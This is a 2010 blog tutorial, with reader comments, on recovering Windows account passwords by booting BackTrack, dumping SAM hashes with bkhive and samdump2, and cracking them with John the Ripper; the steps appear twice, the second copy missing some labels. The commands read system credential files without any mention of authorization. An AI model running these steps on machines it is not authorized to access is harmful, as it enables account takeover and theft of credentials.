Earlier I posted on "How to hack Windows administrator password" using backtrack.This post is the final post of it where we will see how we can retrieve the password without reseting it.
Here I will be using Backtrack4 and boot it from USB but you can also boot it from a CD.
Requirements:
1.Backtrack 4.iso (Download)
2.UseNetbootin (Download)
If you have any problem in installing backtrack in your usb then read .
Procedure:
Step 1.
Having made a bootable usb now reboot the system and boot Backtrack4.Use username:root and password:toor and use startx
Step 2.
Now open up the console window to type the command "df"(Disk free) or fdisk -l to find the drive where you can find the SAM file of your Windows box.Here i will be using "df".
Step 3.
If you find the desired drive in the above step then its ok,if not then you can mount it by using the command mount -t ntfs /dev/sda1 /mnt/sda1 -o force (Here force you may not use).
Step 4.
As we know that SAM file of windows there in config directory of system32.So we need to be in that directory to do our further work.Type in the command cd /mnt/sda1/WINDOWS/system32/config (Mark the "WINDOWS" in the command is in caps on).
Step 5.
Now use bkhive to get a key file to be used in further steps by typing in the command
bkhive system ~/Desktop/key.txt here "~/Desktop/key.txt" is the path of the key file to be created.Having executed the command you can check your desktop if the file has been created.
Step 6.
Here we will be using samdump2 for dumping the hashes by using the key file created in the previous step.The command format is samdump2 [samhive path] [keyfile path].So the command to be used here is samdump2 SAM ~/Desktop/key.txt > ~/Desktop/SHunk_Hash.txt here "~/Desktop/SHunk_Hash.txt" is the path where the hashes from the SAM file will be copied which can be copied.You can check the desktop for the Shunk_Hash.txt file.
Step 7.
In order to view the hash,type in the command cat ~/Desktop/SHunk_Hash.txt as shown below.
Step 8.
Now change the directory to /pentest/password/jtr or simply type "john" you will see the directory has been changed to the desired one.
Step 9.
Now type in ./john ~/Desktop/SHunk_Hash.txt here the john the ripper will search for all the passwords but you can limit it by using ./john ~/Desktop/SHunk_Hash.txt -users=[Desired username without braces].Here "~/Desktop/SHunk_Hash.txt" is the path of the hash file that we created in the previous step.
Command Summary:
1.df
2.mount -t ntfs /dev/sda1 /mnt/sda1 -o force (Optional)
3.cd /mnt/sda1/WINDOWS/system32/config
4.bkhive system ~/Desktop/key.txt
5.samdump2 SAM ~/Desktop/key.txt > ~/Desktop/SHunk_Hash.txt
6.cat ~/Desktop/SHunk_Hash.txt(Optional)
7.cd /pentest/password/jtr
8../john ~/Desktop/SHunk_Hash.txt
OR
./john ~/Desktop/SHunk_Hash.txt -users=[Desired username without braces]
Here I will be using Backtrack4 and boot it from USB but you can also boot it from a CD.
Requirements:
1.Backtrack 4.iso (Download)
2.UseNetbootin (Download)
If you have any problem in installing backtrack in your usb then read .
Procedure:
Step 1.
Having made a bootable usb now reboot the system and boot Backtrack4.Use username:root and password:toor and use startx
Step 2.
Now open up the console window to type the command "df"(Disk free) or fdisk -l to find the drive where you can find the SAM file of your Windows box.Here i will be using "df".
If you find the desired drive in the above step then its ok,if not then you can mount it by using the command mount -t ntfs /dev/sda1 /mnt/sda1 -o force (Here force you may not use).
Step 4.
As we know that SAM file of windows there in config directory of system32.So we need to be in that directory to do our further work.Type in the command cd /mnt/sda1/WINDOWS/system32/config (Mark the "WINDOWS" in the command is in caps on).
Step 5.
Now use bkhive to get a key file to be used in further steps by typing in the command
bkhive system ~/Desktop/key.txt here "~/Desktop/key.txt" is the path of the key file to be created.Having executed the command you can check your desktop if the file has been created.
Step 6.
Here we will be using samdump2 for dumping the hashes by using the key file created in the previous step.The command format is samdump2 [samhive path] [keyfile path].So the command to be used here is samdump2 SAM ~/Desktop/key.txt > ~/Desktop/SHunk_Hash.txt here "~/Desktop/SHunk_Hash.txt" is the path where the hashes from the SAM file will be copied which can be copied.You can check the desktop for the Shunk_Hash.txt file.
In order to view the hash,type in the command cat ~/Desktop/SHunk_Hash.txt as shown below.
Now change the directory to /pentest/password/jtr or simply type "john" you will see the directory has been changed to the desired one.
Step 9.
Now type in ./john ~/Desktop/SHunk_Hash.txt here the john the ripper will search for all the passwords but you can limit it by using ./john ~/Desktop/SHunk_Hash.txt -users=[Desired username without braces].Here "~/Desktop/SHunk_Hash.txt" is the path of the hash file that we created in the previous step.
1.df
2.mount -t ntfs /dev/sda1 /mnt/sda1 -o force (Optional)
3.cd /mnt/sda1/WINDOWS/system32/config
4.bkhive system ~/Desktop/key.txt
5.samdump2 SAM ~/Desktop/key.txt > ~/Desktop/SHunk_Hash.txt
6.cat ~/Desktop/SHunk_Hash.txt(Optional)
7.cd /pentest/password/jtr
8../john ~/Desktop/SHunk_Hash.txt
OR
./john ~/Desktop/SHunk_Hash.txt -users=[Desired username without braces]
Retrieve Windows password using Samdump2 and John with Backtrack4
Reviewed by Satyajit (Admins,a.k.a Satosys)
on
Thursday, December 30, 2010
Rating:
Reviewed by Satyajit (Admins,a.k.a Satosys)
on
Thursday, December 30, 2010
Rating:
4 comments:
Nice,valuable and informatics stuff about retrieving of windows password using samdump2 and john.
Keep it up regularly plz......!
When I try to move into WINDOWS/System32/config I receive error "no such file/directory. Yet if I ls -l on the WINDOWS directory I can see System32 folder but it is highlighted, as are some other directories.
What does this mean? Is this stopping entering System32/config directory? How can i resolve this?
Thanks a lot.
it's Windows/System32/config not WINDOWS/System32/config Hope this helps.
check that you are on the right drive. The last computer I cracked had 2 windows directorys.. one named WINDOWS and the other Windows
2 different directories.. the one I had to use was WINDOWS